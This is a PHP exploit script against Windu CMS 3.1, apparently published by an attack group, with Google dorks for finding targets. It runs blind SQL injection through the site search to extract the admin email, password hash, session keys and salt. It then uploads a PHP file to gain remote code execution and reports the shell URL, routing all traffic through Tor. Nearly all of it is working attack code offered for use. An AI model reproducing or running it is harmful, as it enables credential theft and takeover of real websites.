<?php
//Author: Hacker
//WWW: https://devilteam.pl
//twitter: @devilteam
//
//Windu 3.1 => SQL Inj & RCE
//Date: 18.04.2020
//
//Windu CMS to Darmowy Polski system CMS do zarządzania treścią strony internetowej - content management system.
//http://windu.org/
//
//google dork: intextt:"Na silniku: windu.org"
//google dork: intext:"Works on: windu.org"
//
//
// START SETTINGS
//
//The exploit sends every request through the Tor Browser SOCKS proxy (see sendRequest())
//Target URL
$url = "http://windu3.1";
//
//http://windu/wyszukiwarka/test <- vulnerable search engine
//String returned by the CMS when the search finds existing data
$true_search = "test";
//
//String returned by cms when nothing found in search
$false_search_info = "Nie znaleziono żadnych pasujących materiałów";
//
//RCE
$payload = "<?php phpinfo(); ?>";
//
//
// END SETTINGS
//
//
//-----------------------------
//
//
// START EXPLOIT FLOW
//
//
$admin = getAdmin($url,$true_search,$false_search_info);
$pass = getPass($url,$true_search,$false_search_info);
if(isset($admin) && isset($pass)) {
$login_session = searchAdminloginsession($url,$true_search,$false_search_info,$admin);
$pass_session = searchAdminpasssession($url,$true_search,$false_search_info,$pass);
if(isset($login_session) && isset($pass_session)){
getRCE($url,$login_session,$pass_session,$payload);
//if RCE not works try break password hash abd manual edit page using: {{eval phpinfo()}}
}
// salt needed for break the password hash
getSalt($url,$true_search,$false_search_info);
}
//
//
// END EXPLOIT FLOW
//
//
/* Password hash construction
public function saltPassword($password) {
$passwordPieces = array_reverse(str_split($password));
$saltPieces = str_split(config::get('salt',true));
$counter = 0;
$finalPassword = '';
foreach ($passwordPieces as $piece) {
$finalPassword.=$piece.$saltPieces[$counter];
$counter = $counter+1;
if ($counter>=32)$counter = 0;
}
1
return sha1(sha1(md5(sha1(md5($finalPassword)))));
}
*/
function sendRequest($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9150"); //Tor browser
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
$output = curl_exec($ch);
curl_close($ch);
return $output;
}
function getAdmin($url, $true_search, $false_search){
//get admin
$j=1;$admin="";
while (!strstr($admin,chr(0))){
for ($i=0; $i<=255; $i++){
$output = sendRequest($url."wyszukiwarka/".$true_search."')+or+1=(UNICODE(SUBSTR((SELECT+email+FROM+users+WHERE+superAdministrator=1+limit+0,1),".$j.",1))=".$i.")--");
$pos = strpos($output, $false_search);
if ($pos === false) {
$admin .= chr($i);
echo "admin -> ".$admin."[???]\r\n";
break;
}
if ($i==255) {$admin.=chr(0);break;echo "Done\n";}
}
$j++;
}
return $admin;
}
function getPass($url, $true_search, $false_search){
//get pass
$j=1;$pass="";
while (!strstr($pass,chr(0))){
if ($j === 41) {
break;
}
for ($i=0; $i<=255; $i++){
$output = sendRequest($url."wyszukiwarka/".$true_search."')+or+1=(UNICODE(SUBSTR((SELECT+password+FROM+users+WHERE+superAdministrator=1+limit+0,1),".$j.",1))=".$i.")--");
$pos = strpos($output, $false_search);
if ($pos === false) {
$pass.=chr($i);
echo "pass -> ".$pass."[???]\r\n";
break;
}
}
$j++;
}
return $pass;
}
function searchAdminloginsession($url, $true_search, $false_search, $email){
$j=1;
$admin="";
$email = substr($email, 0, -1);
$arr = unpack("C*", $email);
$val="";
foreach ($arr as &$value) {
$val .= $value.",";
}
$val = substr($val, 0, -1);
while (!strstr($admin, chr(0))){
if ($j === 33) {
break;
}
for ($i=0; $i<=255; $i++){
$output = sendRequest($url."wyszukiwarka/".$true_search."')+or+1=(UNICODE(SUBSTR((SELECT+dataKey+FROM+session+WHERE+data=CHAR(".$val.")),".$j.",1))=".$i.")--");
$pos = strpos($output, $false_search);
if ($pos === false) {
$admin .= chr($i);
echo "admin login session -> ".$admin."[???]\r\n";
break;
}
if ($i==255) {$admin.=chr(0);break;}
}
$j++;
}
return $admin;
}
function searchAdminpasssession($url, $true_search, $false_search, $passhash){
$j=1;$admin="";
$arr = unpack("C*", $passhash);
$val="";
foreach ($arr as &$value) {
$val .= $value.",";
}
$val = substr($val, 0, -1);
while (!strstr($admin,chr(0))){
if ($j === 33) {
break;
}
for ($i=0; $i<=255; $i++){
$output = sendRequest($url."wyszukiwarka/".$true_search."')+or+1=(UNICODE(SUBSTR((SELECT+dataKey+FROM+session+WHERE+data=CHAR(".$val.")),".$j.",1))=".$i.")--");
$pos = strpos($output, $false_search);
if ($pos === false) {
$admin .= chr($i);
echo "admin pass session -> ".$admin."[???]\r\n";
break;
}
if ($i==255) {$admin.=chr(0);break;}
}
$j++;
}
return $admin;
}
function getSalt($url, $true_search, $false_search){
//get salt
$j=1;$salt="";
while (!strstr($salt,chr(0))){
if ($j === 33) {
break;
}
for ($i=0; $i<=255; $i++){
$output = sendRequest($url."wyszukiwarka/".$true_search."')+or+1=(UNICODE(SUBSTR((SELECT+value+FROM+config+WHERE+name=CHAR(115,97,108,116)),".$j.",1))=".$i.")--");
$pos = strpos($output, $false_search);
if ($pos === false) {
$salt.=chr($i);
echo "salt -> ".$salt."[???]\r\n";
break;
}
if ($i==255) {$salt.=chr(0);break;}
}
$j++;
}
return $salt;
}
function getRCE($url,$login_session,$pass_session,$payload){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url."fileServerJsUpload/main/");
curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9150"); //Tor browser
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"-----------------------------32507568294291437482857416325
Content-Disposition: form-data; name=\"files[]\"; filename=\"php.php\"
Content-Type: application/octet-stream
".$payload."
-----------------------------32507568294291437482857416325--");
curl_setopt($ch, CURLOPT_HTTPHEADER,array('Content-Type: multipart/form-data; boundary=---------------------------32507568294291437482857416325','Content-Type: application/octet-stream', 'Cookie: login='.$login_session.'; pass='.$pass_session.';'));
$result=curl_exec ($ch);
$out = json_decode($result, true);
if(isset($out['files'][0]['url'])){
print "!!!PHP SHELL: \n";
print $out['files'][0]['url'];
die();
}
}
?>